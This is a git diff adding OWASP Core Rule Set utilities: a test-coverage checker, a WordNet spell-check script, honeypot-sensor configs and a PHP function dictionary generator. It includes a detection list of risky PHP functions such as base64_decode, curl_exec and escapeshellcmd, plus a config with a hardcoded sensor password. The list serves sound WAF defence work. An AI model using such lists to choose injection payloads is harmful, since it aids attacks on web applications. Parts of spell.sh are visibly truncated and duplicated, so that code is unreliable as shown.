t in tlist: + tname = t.split("/")[-1] + if tname[:7] == "REQUEST": + testlist = glob.glob(t + "/*.yaml") + testlist.sort() + for tc in testlist: + tcname = tc.split("/")[-1].split(".")[0] + test_cases[int(tcname)] = 1 + + # iterate the rule files + for f in flist: + fname = f.split("/")[-1] + if fname[:7] == "REQUEST": + try: + with open(f, 'r') as inputfile: + data = inputfile.read() + except: + print("Can't open file: %s" % f) + print(sys.exc_info()) + sys.exit(1) + + try: + # make a structure + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + # add the parsed structure to a function, which finds the 'id'-s, + # and the collected test cases + rids = find_ids(mparser.configlines, test_cases) + for k in rids.keys(): + errmsgf({'file': f, 'line': rids[k], 'endLine': rids[k], 'title': "Test file missing", 'message': ("rule %d does not have any regression test" % k)}) + except: + print("Can't parse config file: %s" % (f)) + print(sys.exc_info()[1]) + sys.exit(1) + sys.exit(retval) diff --git a/nginx/config/owasp-crs/util/find-rules-without-test/requirements.txt b/nginx/config/owasp-crs/util/find-rules-without-test/requirements.txt new file mode 100644 index 00000000..a9894876 --- /dev/null +++ b/nginx/config/owasp-crs/util/find-rules-without-test/requirements.txt @@ -0,0 +1 @@ +msc-pyparser>=1.2.1 diff --git a/nginx/config/owasp-crs/util/fp-finder/english-extended.txt b/nginx/config/owasp-crs/util/fp-finder/english-extended.txt new file mode 100644 index 00000000..8a3c41b4 --- /dev/null +++ b/nginx/config/owasp-crs/util/fp-finder/english-extended.txt @@ -0,0 +1,31 @@ +basename +checkdate +chroot +config +crypto +dir +exp +file_exists +fileatime +filectime +filegroup +fileinode +filemtime +fileowner +fileperms +filesize +filetype +idate +is_a +md5 +misc +ord +popen +prev +stat +substr +symlink +syslog +ucfirst +unlink +unset diff --git a/nginx/config/owasp-crs/util/fp-finder/spell.sh b/nginx/config/owasp-crs/util/fp-finder/spell.sh new file mode 100755 index 00000000..2e5dde3d --- /dev/null +++ b/nginx/config/owasp-crs/util/fp-finder/spell.sh @@ -0,0 +1,163 @@ +#!/bin/bash + +# This program uses WordNet to find English words. The WordNet license: + +# WordNet Release 3.0 This software and database is being provided to you, +# the LICENSEE, by Princeton University under the following license. +# By obtaining, using and/or copying this software and database, you agree that you have read, +# understood, and will comply with these terms and conditions.: Permission to use, copy, +# modify and distribute this software and database and its documentation for any purpose and +# without fee or royalty is hereby granted, provided that you agree to comply with +# the following copyright notice and statements, including the disclaimer, and that the same +# appear on ALL copies of the software, database and documentation, including modifications +# that you make for internal use or for distribution. +# WordNet 3.0 Copyright 2006 by Princeton University. +# All rights reserved. +# THIS SOFTWARE AND DATABASE IS PROVIDED "AS IS" AND PRINCETON UNIVERSITY MAKES NO REPRESENTATIONS +# OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PRINCETON UNIVERSITY +# MAKES NO REPRESENTATIONS OR WARRANTIES OF MERCHANT- ABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE +# OR THAT THE USE OF THE LICENSED SOFTWARE, DATABASE OR DOCUMENTATION WILL NOT INFRINGE ANY THIRD +# PARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS. +# The name of Princeton University or Princeton may not be used in advertising or publicity +# pertaining to distribution of the software and/or database. Title to copyright in this +# software, database and any associated documentation shall at all times remain with +# Princeton University and LICENSEE agrees to preserve same. + +if ! command -v wn > /dev/null 2>&1; then + cat < checking ${datafile_name}" + fi + + local datafile="${1}" + local datafile_name + + if [ "${1}" = "-" ]; then + datafile="/dev/stdin" + datafile_name="stdin" + else + datafile_name="${datafile##*/}" + fi + + local datafile="${1}" + local datafile_name + + if [ "${1}" = "-" ]; then + datafile="/dev/stdin" + datafile_name="stdin" + else + datafile_name="${datafile##*/}" + fi + + while read -r word; do + # wordnet exit code is equal to number of search results + if [ -n "${SUFFIX}" ]; then + word="$(sed -E "s/(.*)${SUFFIX}/\1/" <<<"${word}")" + fi + if ! grep -qE '^[A-Za-z]+$' <<<"${word}"; then + continue + fi + + if ! wn "${word}" >/dev/null 2>&1; then + if ! ${MACHINE_READABLE}; then + printf " \`- found English word via wn: " + fi + echo "${word}" + else + if ${USE_EXTENDED}; then + # shellcheck disable=SC2046 + if [ $(grep -c -E "^$word$" "$EXTENDED_WORDS_LIST_PATH") -ne 0 ]; then + if ! ${MACHINE_READABLE}; then + printf " \`- found English word via extended list: " + fi + echo "${word}" + fi + fi + fi + done <<<"$(sort "${datafile}" | uniq)" + + if ! ${MACHINE_READABLE}; then + echo "" + fi +} + +usage() { + cat < /dev/null && pwd ) +EXTENDED_WORDS_LIST_PATH="${SCRIPT_DIR}/english-extended.txt" +RULES_DIR="${SCRIPT_DIR}/../../rules/" + +MACHINE_READABLE=false +USE_EXTENDED=false + +POSITIONAL_ARGS=() +while [[ $# -gt 0 ]]; do + # shellcheck disable=SC2221,SC2222 + case $1 in + -m|--machine) + MACHINE_READABLE=true + shift + ;; + -e|--extended) + USE_EXTENDED=true + shift + ;; + -s|--suffix) + shift + SUFFIX="${1}" + shift + ;; + -h|--help) + usage + exit 1 + ;; + -*|--*) + if [ $# -eq 1 ]; then + POSITIONAL_ARGS+=("$1") # save positional arg + shift # past argument + else + echo "Unknown option $1" + usage + exit 1 + fi + ;; + *) + POSITIONAL_ARGS+=("$1") # save positional arg + shift + ;; + esac +done + +set -- "${POSITIONAL_ARGS[@]}" # restore positional parameters + + +if [ -n "${1}" ]; then + check "${1}" +else + for datafile in "${RULES_DIR}"*.data; do + check "${datafile}" + done +fi diff --git a/nginx/config/owasp-crs/util/geo-location/README b/nginx/config/owasp-crs/util/geo-location/README new file mode 100644 index 00000000..b9018fb9 --- /dev/null +++ b/nginx/config/owasp-crs/util/geo-location/README @@ -0,0 +1,5 @@ +License +The GeoLite databases are distributed under the Creative Commons Attribution-ShareAlike 3.0 Unported License. The attribution requirement may be met by including the following in all advertising and documentation mentioning features of or use of this database: + +This product includes GeoLite data created by MaxMind, available from + http://www.maxmind.com. diff --git a/nginx/config/owasp-crs/util/honeypot-sensor/README.md b/nginx/config/owasp-crs/util/honeypot-sensor/README.md new file mode 100644 index 00000000..66fc6af9 --- /dev/null +++ b/nginx/config/owasp-crs/util/honeypot-sensor/README.md @@ -0,0 +1,14 @@ +The purpose of these files is to turn your current ModSecurity host into +a pseudo-honeypot sensor by doing the following: + +1. Instructs Apache to listen for traffic on multiple unused ports + - 8000 + - 8080 + - 8888 +2. Creates Apache virtual host containers to bind to these ports. +3. If any traffic is received on these ports, then ModSecurity will + inspect the traffic by inheriting any rules specified in the main + Apache configuration. +4. ModSecurity's Audit Engine will use the mlogc program to forward + the audit log entry onto the ModSecurity Project's central logging + server. diff --git a/nginx/config/owasp-crs/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/nginx/config/owasp-crs/util/honeypot-sensor/mlogc-honeypot-sensor.conf new file mode 100644 index 00000000..b4afad14 --- /dev/null +++ b/nginx/config/owasp-crs/util/honeypot-sensor/mlogc-honeypot-sensor.conf @@ -0,0 +1,97 @@ +########################################################################## +# Required configuration +# At a minimum, the items in this section will need to be adjusted to +# fit your environment. The remaining options are optional. +########################################################################## + +# Points to the root of the installation. All relative +# paths will be resolved with the help of this path. +CollectorRoot "/var/log/mlogc" + +# ModSecurity Console receiving URI. You can change the host +# and the port parts but leave everything else as is. +ConsoleURI "http://204.13.200.239/rpc/auditLogReceiver" + +# Sensor credentials +SensorUsername "honeypot-sensor" +SensorPassword "test1234" + +# Base directory where the audit logs are stored. This can be specified +# as a path relative to the CollectorRoot, or a full path. +LogStorageDir "data" + +# Transaction log will contain the information on all log collector +# activities that happen between checkpoints. The transaction log +# is used to recover data in case of a crash (or if Apache kills +# the process). +TransactionLog "mlogc-transaction.log" + +# The file where the pending audit log entry data is kept. This file +# is updated on every checkpoint. +QueuePath "mlogc-queue.log" + +# The location of the error log. +ErrorLog "mlogc-error.log" + +# The location of the lock file. +LockFile "mlogc.lck" + +# Keep audit log entries after sending? (0=false 1=true) +# NOTE: This is required to be set in SecAuditLog mlogc config if you +# are going to use a secondary console via SecAuditLog2. +KeepEntries 0 + + +########################################################################## +# Optional configuration +########################################################################## + +# The error log level controls how much detail there +# will be in the error log. The levels are as follows: +# 0 - NONE +# 1 - ERROR +# 2 - WARNING +# 3 - NOTICE +# 4 - DEBUG +# 5 - DEBUG2 +# +ErrorLogLevel 3 + +# How many concurrent connections to the server +# are we allowed to open at the same time? Log collector uses +# multiple connections in order to speed up audit log transfer. +# This is especially needed when the communication takes place +# over a slow link (e.g. not over a LAN). +MaxConnections 10 + +# How many requests a worker will process before recycling itself. +# This is to help prevent problems due to any memory leaks that may +# exists. If this is set to 0, then no maximum is imposed. The default +# is 1000 requests per worker (the number of workers is controlled by the +# MaxConnections limit). +MaxWorkerRequests 1000 + +# The time each connection will sit idle before being reused, +# in milliseconds. Increase if you don't want ModSecurity Console +# to be hit with too many log collector requests. +TransactionDelay 50 + +# The time to wait before initialization on startup in milliseconds. +# Increase if mlogc is starting faster then termination when the +# sensor is reloaded. +StartupDelay 5000 + +# How often is the pending audit log entry data going to be written +# to a file. The default is 15 seconds. +CheckpointInterval 15 + +# If the server fails all threads will back down until the +# problem is sorted. The management thread will periodically +# launch a thread to test the server. The default is to test +# once in 60 seconds. +ServerErrorTimeout 60 + +# The following two parameters are not used yet, but +# reserved for future expansion. +# KeepAlive 150 +# KeepAliveTimeout 300 diff --git a/nginx/config/owasp-crs/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf b/nginx/config/owasp-crs/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf new file mode 100644 index 00000000..7002bb76 --- /dev/null +++ b/nginx/config/owasp-crs/util/honeypot-sensor/modsecurity_crs_10_honeypot.conf @@ -0,0 +1,30 @@ +# +# Add in honeypot ports. +# - These are common proxy ports used by attackers +# - All traffic accepted on these ports are suspicious. +# +Listen 8000 +Listen 8080 +Listen 8888 + +# +# Create basic virtual host containers that will forward all traffic received +# to the official ModSecurity Project honeypot logging host. +# +# - You should adjust the Document root location to an empty directory on your server +# - Also adjust the path to your local ModSecurity mlogc program and for the +# mlogc-honeypot-sensor.conf file. +# - Make sure you main SecAuditLogType is set to concurrent mode. +# + +ServerName www.example1.com +DocumentRoot "/usr/local/apache/honeypot-htdocs" + + Options none + AllowOverride None + Order allow,deny + Allow from all + +SecAuditEngine On +SecAuditLog "|/usr/local/apache/bin/mlogc /usr/local/apache/conf/mlogc-honeypot-sensor.conf" + diff --git a/nginx/config/owasp-crs/util/id-range b/nginx/config/owasp-crs/util/id-range new file mode 100644 index 00000000..a58cf06e --- /dev/null +++ b/nginx/config/owasp-crs/util/id-range @@ -0,0 +1,2 @@ +900000-2999999 +2000000-299999 diff --git a/nginx/config/owasp-crs/util/join-multiline-rules/join.py b/nginx/config/owasp-crs/util/join-multiline-rules/join.py new file mode 100755 index 00000000..7a2fc4ce --- /dev/null +++ b/nginx/config/owasp-crs/util/join-multiline-rules/join.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python +# +# This script reads all the rule files passed on the command line, +# and outputs them, with each (multi-line) directive joined as a +# single line. +# +# This can be used to work around a bug in Apache < 2.4.11 in +# parsing long configuration directives. +# +# Usage: +# +# util/join-multiline-rules/join.py rules/*.conf > rules/rules.conf.joined +# +# This produces a single 'rules.conf.joined' file that can be included +# in buggy Apache versions. It is recommended to keep this file in the +# rules/ directory (because it refers to .data files in that directory) +# but give it a name not ending in .conf (so the file will not be +# included in *.conf and you can re-run the command multiple times +# without including its own output). +# +# Example: +# +# SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" \ +# "id:901120,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.blocking_paranoia_level=1" +# +# will be outputted as: +# +# SecRule &TX:BLOCKING_PARANOIA_LEVEL "@eq 0" "id:901120,phase:1,pass,nolog,setvar:tx.blocking_paranoia_level=1" +# + +import fileinput, sys + +for line in fileinput.input(): + line = line.strip() + if line == '': + sys.stdout.write("\n") + continue + + if line[-1] == '\\': + sys.stdout.write(line[0:-1]) + else: + sys.stdout.write(line) + sys.stdout.write("\n") diff --git a/nginx/config/owasp-crs/util/php-dictionary-gen/php-dictionary-creator.sh b/nginx/config/owasp-crs/util/php-dictionary-gen/php-dictionary-creator.sh new file mode 100755 index 00000000..dcb0c55e --- /dev/null +++ b/nginx/config/owasp-crs/util/php-dictionary-gen/php-dictionary-creator.sh @@ -0,0 +1,501 @@ +#!/bin/bash +# +# This is a utility script to create wordlists for later use by the +# OWASP ModSecurity Core Rule Set. +# +# The scripts extracts function names out of the PHP source code and +# filters them into different categories. +# + +IFS=$'\n\t' + +# -------------------------------------------------- +# Initialization +# -------------------------------------------------- + +VERBOSE=0 +ERROR=0 + +MYDATE=$(date +"%Y-%m-%d") +MYDATE_SECONDS=$(date +"%s") + +AGE_LIMIT=30 +FREQUENCY_LIMIT=90000 + +RULES="933150 933151 933161" +RULES_CMDLINE="" + +PHP_REPO="" +PHP_REPO_CMDLINE="" +PHP_REPO_GITHUB="https://github.com/php/php-src" + +SPELL_PATH="../fp-finder/spell.sh" +SPELL_PATH_CMDLINE="" + + +DEFAULT_PHP_FUNCTIONS_FREQUENCIES="./frequencylist.txt" +TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS=$(mktemp) +PHP_FUNCTIONS_FREQUENCIES_CMDLINE="" + +TMP_PHP_FUNCTIONS=$(mktemp) +TMP_ENGLISH_WORDS=$(mktemp) +TMP_PHP_FUNCTIONS_FREQUENT=$(mktemp) +TMP_PHP_FUNCTIONS_RARE=$(mktemp) +TMPDIR=$(mktemp -d) + +trap 'rm -rf $TMP_PHP_FUNCTIONS $TMP_PHP_FUNCTIONS_FREQUENT $TMP_PHP_FUNCTIONS_RARE $TMP_ENGLISH_WORDS $TMPDIR' INT TERM EXIT + +HIGH_RISK_FUNCTIONS_FILENAME="php-high-risk-functions.txt" + +R933160_FILENAME="933160.ra" +R933161_FILENAME="933161.ra" + +read -r -d '' TOOLCHAIN_PREFIX << 'EOF' +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. +EOF + +read -r -d '' R933161_PREFIX << 'EOF' +##!+ i +##!^ \b +##!$ (?:\s|/\*.*\*/|#.*|//.*)*\(.*\) +EOF + +PHP_DICTIONARY_GEN_PREFIX="##! File autogenerated by util/php-dictionary-gen with:" + +R933150_FILENAME="php-function-names-933150.data" +R933151_FILENAME="php-function-names-933151.data" + +DATA_FILE_PATH="../../rules/" +RA_FILE_PATH="../../regex-assembly/" + +# -------------------------------------------------- +# Library Functions +# -------------------------------------------------- + +function usage { + + cat << EOF + +This is a utility script to create wordlists for later use by the +OWASP ModSecurity Core Rule Set. + +Usage: + +$> $(basename "$0") [options] + +Options: + + -a --agelimit STR Age in days before frequency is retrieved anew from github + Only makes sense when used together with frequencylist + Default: $AGE_LIMIT + -h --help Print help text and exit. + -f --frequencylist STR File with frequencies of PHP function usage on github + Default: $DEFAULT_PHP_FUNCTIONS_FREQUENCIES + -F --frequencylimit STR Minimum number of occurrences in GitHub repo to qualify for base rule + Functions not meeting this limit will be added to stricter sibling + Default: $FREQUENCY_LIMIT + -p --phprepo STR Path to PHP repository. Optional. + -r --rules STR Space separated list of rules to cover. + Rules available: + * 933150 + * 933151 + * 933161 + Default: "$RULES" + -s --spell STR Path of spell.sh script. + Default: $SPELL_PATH + -v --verbose Verbose output + + +Filter Architecture +------------------- +See discussion at +https://github.com/coreruleset/coreruleset/pull/3228#issuecomment-1594813466 + +Input: Function list out of PHP source code + +Filter 1: Is the function name an English word? +If yes: Add to source for rule 933161 +If no: Continue +Filter 2: Is the function name frequently used on GitHub (across all PHP repos)? +If yes: Add to word list for 933150 +If no: Add to word list for 933151 + +Please note that rules 933150 and 933151 are parallel match rules. So the +output of this script is the parallel match file for these rules. + +Rule 933161 is a regular expression rule, though, so the output of this +script is the source file for the CRS toolchain. + +EOF + + exit 0 +} + +function break_on_error { + if [ "$1" -ne 0 ]; then + echo + if [ -n "$2" ]; then + echo -e "$2" + fi + echo "FAILED. This is fatal. Aborting" + exit 1 + fi +} + + +function get_frequency { + NUM="" + N=0 + + until [ -n "$NUM" ] || [ $N -gt 4 ]; do + N=$((N + 1)) + + CURL_OUTPUT=$(curl -v \ + --header "X-GitHub-Api-Version: 2022-11-28" \ + --header "Accept: application/vnd.github+json" \ + --header "Authorization: Bearer $GITHUB_TOKEN" \ + "https://api.github.com/search/code?q=$1+language:php&type=Code&per_page=1" 2>&1) + + NUM=$(echo "$CURL_OUTPUT" | grep "total_count" | grep -o -E "[0-9]*") + + if [ -z "$NUM" ]; then + >&2 echo -n " Curl call for $1 failed." + if [ "$(echo "$CURL_OUTPUT" | grep -c "x-ratelimit-remaining: 0")" -eq 1 ]; then + >&2 echo -n " Hitted rate limit. Waiting..." + # 50 is the number of seconds to wait for the rate limit to be reset to 10 + # /search/code endpoint is limited to 10 requests per minute. + # See https://docs.github.com/en/rest/search/search?apiVersion=2022-11-28#search-code + sleep 25 + fi + >&2 echo " Trying again ($N)." + fi + + sleep 1 + done + if [ -z "$NUM" ]; then + echo "- $1" >> "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" + fi + echo "$NUM" +} + + +function vprint { + + if [ $VERBOSE -eq 1 ]; then + echo -e "$1" + fi +} + +# -------------------------------------------------- +# Parameter reading and checking +# -------------------------------------------------- + +while true +do + if [ -n "${1-}" ]; then + ARG="${1-}" + FIRSTCHAR="$(echo "$ARG " | cut -b1)" + # The space after $ARG makes sure CLI option "-e" (an echo option) is also accepted + if [ "$FIRSTCHAR" == "-" ]; then + case $1 in + -h) usage; exit;; + --help) usage; exit;; + -a) export AGE_LIMIT_CMDLINE="${2-}"; shift;; + --agelimit) export AGE_LIMIT_CMDLINE="${2-}"; shift;; + -f) export PHP_FUNCTIONS_FREQUENCIES_CMDLINE="${2-}"; shift;; + --frequencylist) export PHP_FUNCTIONS_FREQUENCIES_CMDLINE="${2-}"; shift;; + -F) export FREQUENCY_LIMIT_CMDLINE="${2-}"; shift;; + --frequencylimit) export FREQUENCY_LIMIT_CMDLINE="${2-}"; shift;; + -p) export PHP_REPO_CMDLINE="${2-}"; shift;; + --phprepo) export PHP_REPO_CMDLINE="${2-}"; shift;; + -r) export RULES_CMDLINE="${2-}"; shift;; + --rules) export RULES_CMDLINE="${2-}"; shift;; + -s) export SPELL_PATH_CMDLINE="${2-}"; shift;; + --spell) export SPELL_PATH_CMDLINE="${2-}"; shift;; + -v) export VERBOSE=1;; + --verbose) export VERBOSE=1;; + *) echo "Unknown option $1. This is fatal. Aborting."; exit 1;; + esac + if [ -n "${1-}" ]; then + shift + fi + else + break + fi + else + break + fi +done + +if [ -n "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE" ]; then + if [ ! -f "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE" ]; then + echo "$PHP_FUNCTIONS_FREQUENCIES_CMDLINE is not existing. This is fatal. Aborting." + exit 1 + else + PHP_FUNCTIONS_FREQUENCIES=$PHP_FUNCTIONS_FREQUENCIES_CMDLINE + echo "Setting custom frequency list file: $PHP_FUNCTIONS_FREQUENCIES." + fi +else + PHP_FUNCTIONS_FREQUENCIES=$DEFAULT_PHP_FUNCTIONS_FREQUENCIES + echo "Setting default frequency list file: $PHP_FUNCTIONS_FREQUENCIES." +fi + + +if [ -n "$PHP_REPO_CMDLINE" ]; then + if [ -d "$PHP_REPO_CMDLINE" ]; then + PHP_REPO="$PHP_REPO_CMDLINE" + else + echo "Path to PHP repository passed on command line is not existing. This is fatal. Aborting." + exit 1 + fi +fi + +if [ -n "$AGE_LIMIT_CMDLINE" ]; then + AGE_LIMIT="$AGE_LIMIT_CMDLINE" +fi + +if [ -n "$FREQUENCY_LIMIT_CMDLINE" ]; then + FREQUENCY_LIMIT="$FREQUENCY_LIMIT_CMDLINE" +fi + +# Adding parameters used by this run to the prefix that will be printed on the generated files. +PHP_DICTIONARY_GEN_PREFIX="$PHP_DICTIONARY_GEN_PREFIX -a $AGE_LIMIT -F $FREQUENCY_LIMIT -s $SPELL_PATH" + +if [ -n "$RULES_CMDLINE" ]; then + # Making sure the rules given on the cmd line can be accomodated for. + echo "$RULES_CMDLINE" | tr " " "\n" | while read -r RULE; do + echo "$RULE" | grep -E -q "^(933150|933151|933161)$" + if [ $? -ne 0 ]; then + echo "Rule $RULE is not available. This is fatal. Aborting." + exit + fi + done +fi + +if [ -n "$SPELL_PATH_CMDLINE" ]; then + if [ ! -x "$SPELL_PATH_CMDLINE" ]; then + echo "$SPELL_PATH_CMDLINE is not existing or is not executable. This is fatal. Aborting." + exit 1 + else + SPELL_PATH=$SPELL_PATH_CMDLINE + fi +fi + +# check if WordNet (wn) is installed +# We could also defer this test to spell.sh. But if done ourselves, we can +# control the error message and behavior. +if [ "$(command -v wn > /dev/null 2>&1 )" ]; then + cat </dev/null 2>&1 + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR + echo "done" + PHP_REPO="$TMPDIR" +else + echo -n "Updating PHP repo ... " + PWD_SAVE=$(pwd) + cd $PHP_REPO || break_on_error 1 "Cannot cd to $PHP_REPO" + git checkout master >/dev/null 2>&1 + git pull --depth 1 >/dev/null 2>&1 + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR + echo "done" + cd "$PWD_SAVE" || break_on_error 1 "Cannot cd back to $PWD_SAVE" +fi + +# Step 2 - Extract Function Names +echo -n "Extracting PHP function names ... " +# Strings containing "$" are excluded (E.g. "{$this->getDeclarationName") +grep -o --no-file -R 'ZEND_FUNCTION(.*)' "$PHP_REPO" | grep -v '\$' | cut -f2 -d\( | cut -f1 -d\) | sort | uniq > $TMP_PHP_FUNCTIONS +ERROR=$(($ERROR|$?)) # logical OR +break_on_error $ERROR +echo "done ($(wc -l "$TMP_PHP_FUNCTIONS" | xargs echo | cut -d\ -f1 ) function names found)" + +# Step 3 - Filter 1: Is it an English word +echo -n "Extracting English words out of list of PHP function names ... " +$SPELL_PATH --machine --extended "$TMP_PHP_FUNCTIONS" > "$TMP_ENGLISH_WORDS" +ERROR=$(($ERROR|$?)) # logical OR +break_on_error $ERROR "$(cat "$TMP_ENGLISH_WORDS")" +echo "done ($(wc -l "$TMP_ENGLISH_WORDS" | xargs echo | cut -d\ -f1 ) english words found)" +# Step 4 - Output 933161 +if [ "$DO_RULE_933161" == "1" ]; then + # Being 933161 a stricter sibling of 933160, 933160 entries are also added to 933161. + # We read the 933160 file skipping comments and empty lines. Entries are added to 933161 (if not already present). + grep -v '^#' "$RA_FILE_PATH$R933160_FILENAME" | awk NF | while read -r R933160_ENTRY; do + + if [ $(grep -c -E "^$R933160_ENTRY$" "$TMP_ENGLISH_WORDS") -eq 0 ]; then + # we have to add this function to 933161 + echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME added to the stricter sibling $R933161_FILENAME" + echo "$R933160_ENTRY" >> "$TMP_ENGLISH_WORDS" + else + echo "Function \"$R933160_ENTRY\" from $R933160_FILENAME already present in the stricter sibling $R933161_FILENAME" + fi + + done + + sort -o "$TMP_ENGLISH_WORDS" "$TMP_ENGLISH_WORDS" + echo -n "Writing output for rule 933161 to $R933161_FILENAME ... " + echo "$TOOLCHAIN_PREFIX" > $RA_FILE_PATH$R933161_FILENAME + echo -e "\n$PHP_DICTIONARY_GEN_PREFIX\n" >> $RA_FILE_PATH$R933161_FILENAME + echo "$R933161_PREFIX" >> $RA_FILE_PATH$R933161_FILENAME + # new line print is in a separate echo to avoid echoing the prefix without enabling interpretation of backslash escapes + echo -e -n "\n" >> $RA_FILE_PATH$R933161_FILENAME + cat "$TMP_ENGLISH_WORDS" >> $RA_FILE_PATH$R933161_FILENAME + echo "done" +fi + +# Step 5 - Create or update frequency list +echo "Creating / updating frequency list for functions (namely creating may take a while) ..." +sed -i -e "s/^/^/" -e "s/$/$/" "$TMP_ENGLISH_WORDS" +cat "$TMP_PHP_FUNCTIONS" | grep -v -E -f "$TMP_ENGLISH_WORDS" | while read -r FUNCTION; do + + grep -q -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" + if [ $? -ne 0 ]; then + # function name not found in frequency list + echo "Function $FUNCTION not found in frequency file. Attempting to add." + NUM=$(get_frequency "$FUNCTION") + if [ -z "$NUM" ]; then + echo " Retrieving frequency failed. Cannot add item." + else + echo " Adding entry for function $FUNCTION with frequency $NUM" + echo "$FUNCTION $NUM $MYDATE" >> "$PHP_FUNCTIONS_FREQUENCIES" + sort -o "$PHP_FUNCTIONS_FREQUENCIES" "$PHP_FUNCTIONS_FREQUENCIES" + fi + else + # function name found in frequency list + TIMESTAMP=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f3) + TIMESTAMP_SECONDS=$(date -d "$TIMESTAMP" +%s 2>&1) # For MacOS users: gdate is needed instead of date + ERROR=$(($ERROR|$?)) # logical OR + break_on_error $ERROR "$TIMESTAMP_SECONDS\nError. Check that date is the GNU date binary from coreutils." + DIFF_SECONDS=$((MYDATE_SECONDS - TIMESTAMP_SECONDS)) + DIFF_DAYS=$(($DIFF_SECONDS / 86400)) + NUM=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f2) + vprint "Function $FUNCTION exists (timestamp: $TIMESTAMP, age: $DIFF_DAYS, frequency: $NUM)" + if [ $DIFF_DAYS -gt "$AGE_LIMIT" ]; then + NUM=$(get_frequency "$FUNCTION") + if [ -z "$NUM" ]; then + echo "Entry for function $FUNCTION is too old. Updating failed. Removing record." + sed -i -e "/^$FUNCTION /d" "$PHP_FUNCTIONS_FREQUENCIES" + else + echo "Entry for function $FUNCTION is too old. Updating with new data (new frequency: $NUM)." + sed -i -e "s/^$FUNCTION .*/$FUNCTION $NUM $MYDATE/" "$PHP_FUNCTIONS_FREQUENCIES" + fi + + fi + fi + +done +echo "Done creating / updating frequency list." + +# Step 6 - Filter 2: Output depending on frequency +echo "Starting filtering PHP functions names with frequency limit: $FREQUENCY_LIMIT..." +cat "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f1 | while read -r FUNCTION; do + NUM=$(grep -E "^$FUNCTION " "$PHP_FUNCTIONS_FREQUENCIES" | cut -d\ -f2) + if [ -n "$NUM" ] && [ "$NUM" -gt "$FREQUENCY_LIMIT" ]; then + if [ "$DO_RULE_933150" == "1" ]; then + echo "Function \"$FUNCTION\" (frequency $NUM) added to $R933150_FILENAME" + echo "$FUNCTION" >> "$TMP_PHP_FUNCTIONS_FREQUENT" + fi + else + if [ "$DO_RULE_933151" == "1" ]; then + echo "Function \"$FUNCTION\" (frequency $NUM) added to $R933151_FILENAME" + echo "$FUNCTION" >> "$TMP_PHP_FUNCTIONS_RARE" + fi + fi +done + +echo "Done filtering PHP functions names." +if [ -s "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" ]; then + FAILED_COUNTER=$(echo "$PHP_FUNCTIONS_FREQUENCIES_ERRORS" | wc -l | xargs echo) + echo -n "Failed to retrieve frequency for $FAILED_COUNTER function(s)" + if [ $VERBOSE -eq 1 ]; then + echo ":" + cat "$TMP_PHP_FUNCTIONS_FREQUENCIES_ERRORS" + else + echo "." + fi +fi + +if [ "$DO_RULE_933150" == "1" ]; then + # 933150 comes with a second source of non english words high-risk php functions. + # Any occurrence that is part of that list and not already in 933150 is now added. + cat "$HIGH_RISK_FUNCTIONS_FILENAME" | while read -r HIGH_RISK_FUNC; do + if [ $(grep -c -E "^$HIGH_RISK_FUNC$" "$TMP_PHP_FUNCTIONS_FREQUENT") -eq 0 ]; then + # we have to add this function to 933150 + echo "High-risk function \"$HIGH_RISK_FUNC\" added to $R933150_FILENAME" + echo "$HIGH_RISK_FUNC" >> "$TMP_PHP_FUNCTIONS_FREQUENT" + else + echo "High-risk function \"$HIGH_RISK_FUNC\" already present in $R933150_FILENAME" + fi + + done + sort -o "$TMP_PHP_FUNCTIONS_FREQUENT" "$TMP_PHP_FUNCTIONS_FREQUENT" + echo "File $R933150_FILENAME updated." + echo "$PHP_DICTIONARY_GEN_PREFIX" > $DATA_FILE_PATH$R933150_FILENAME + cat "$TMP_PHP_FUNCTIONS_FREQUENT" >> $DATA_FILE_PATH$R933150_FILENAME +fi +if [ "$DO_RULE_933151" == "1" ]; then + echo "File $R933151_FILENAME updated." + echo "$PHP_DICTIONARY_GEN_PREFIX" > $DATA_FILE_PATH$R933151_FILENAME + cat "$TMP_PHP_FUNCTIONS_RARE" >> $DATA_FILE_PATH$R933151_FILENAME +fi + +if [ "$DO_RULE_933161" == "1" ]; then + echo '933161.ra file updated, mind to run "crs-toolchain regex update --all" before committing changes' +fi + +TIME_END=$(date +"%s") +echo "The script took $((TIME_END-MYDATE_SECONDS)) seconds to complete." + + +# -------------------------------------------------- +# Cleanup +# -------------------------------------------------- + +# Temp files are cleaned via trap set above. diff --git a/nginx/config/owasp-crs/util/php-dictionary-gen/php-high-risk-functions.txt b/nginx/config/owasp-crs/util/php-dictionary-gen/php-high-risk-functions.txt new file mode 100644 index 00000000..78b69852 --- /dev/null +++ b/nginx/config/owasp-crs/util/php-dictionary-gen/php-high-risk-functions.txt @@ -0,0 +1,214 @@ +array_diff_uassoc +array_diff_ukey +array_filter +array_intersect_uassoc +array_intersect_ukey +array_map +array_reduce +array_udiff +array_udiff_assoc +array_udiff_uassoc +array_uintersect +array_uintersect_assoc +array_uintersect_uassoc +base64_decode +base64_encode +bson_decode +bson_encode +bzdecompress +bzopen +convert_uuencode +curl_exec +curl_file_create +curl_init +debug_backtrace +error_reporting +escapeshellarg +escapeshellcmd +exif_imagetype +exif_read_data +exif_tagname +exif_thumbnail +finfo_open +fopen +fputs 